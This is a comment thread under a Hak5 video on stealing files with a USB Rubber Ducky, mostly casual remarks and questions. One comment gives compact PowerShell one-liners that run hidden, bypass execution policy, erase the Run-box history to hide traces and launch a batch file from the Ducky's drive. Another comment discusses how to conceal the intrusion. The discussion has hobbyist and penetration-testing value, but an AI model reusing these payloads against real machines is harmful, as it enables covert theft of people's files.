43 thoughts on “Stealing Files with the USB Rubber Ducky – Hak5 2112

  1. Thanks for the awesome video guys, will await your second part where you explain what is in the cmd file and then will have to break out my Ducky and give it a try :)

  2. Why do people keep saying # this the Pound symbol? It's the hash symbol. Nobody in the UK uses #! It's £. x_x Nevermind, apparently it's another word for hash, which sounds silly to me… x_x Just call it a hash to save confusion. :P

  3. Anyone who uses run will notice when it's empty.
    Maybe find a way to copy it and replace it?

    Don't know if this will be possible within 160 lines, but you could also move this to the b.cmd, have it both start the shell, AND restore the run line history.

  4. I believe i am missing something fundamental.
    We are going through all this trouble to make an interface-less "backup" of data, so we are assuming the actor is plugging the ducky in when the victim is there? And the victim didnt notice the actor plugging it in?
    It is much more likely to not have the victim around, so not having an interface is a drawback, as the actor wont know the earliest he can remove the ducky.
    I couldnt find any specs on the ducky's write speeds so with no interface, and not knowing how much data there is to "backup" how does the actor know how long to leave it plugged in?
    I think for once movies have it right with the hackers/spies popping it in and see a progress bar so they know at the earliest when they can remove it.

  5. Using SET will create an environment variable, but to access it using Powershell you need to use $Env:DK instead of %DK%. Since you're concerned with shortness, you can replace "Start-Process" with "start". It's exactly the same thing :)

  6. I'm surprised they even read the contents of your run box. They aren't usually that savvy. I've seen them look RIGHT AT jigsaw and completely ignore it while they hur dur syskey

    Also, 209 characters:

    powershell -NoP -NonI -W Hidden -Exec Bypass "rp -path 'HKCU:SoftwareMicrosoftWindowsCurrentVersionExplorerRunEMU' -Name'*'-EA 0;$P=gwmi Win32_Volume|?{$_.Label -eq 'K'}|select name; cd $P.name;.d.cmd"

    If you offload the RunEMU cleanup to the batch file (which you are going to be running anyway), you can get it down to 119:

    powershell -NoP -NonI -W Hidden -Exec Bypass "$P=gwmi Win32_Volume|?{$_.Label -eq 'K'}|select name; cd $P.name;.d.cmd"

  7. Great vid as usual, please get rid of Patrick Norton,he is so computer illiterate,I know 12 year olds that know much more than him,he was relevant in the late 90's and 2000's ,now he is just annoying and imho brings the channel down.

  8. Does the Rubber Ducky take care of the different Keyboard layouts and only prints what the programmer intends as an output?
    An Arduino for example can only operate properly on an en-US keyboard layout without changing the layout beforehand (Slashes and other special characters have to be called differently than expected) or fiddleing with the Keyboard library itself
    example: @ would have to be called with " when the default layout is en en-GB, since Shift+2 on an GB Keyboard outputs " but @ on an US Keyboard

Leave a Reply

Your email address will not be published. Required fields are marked *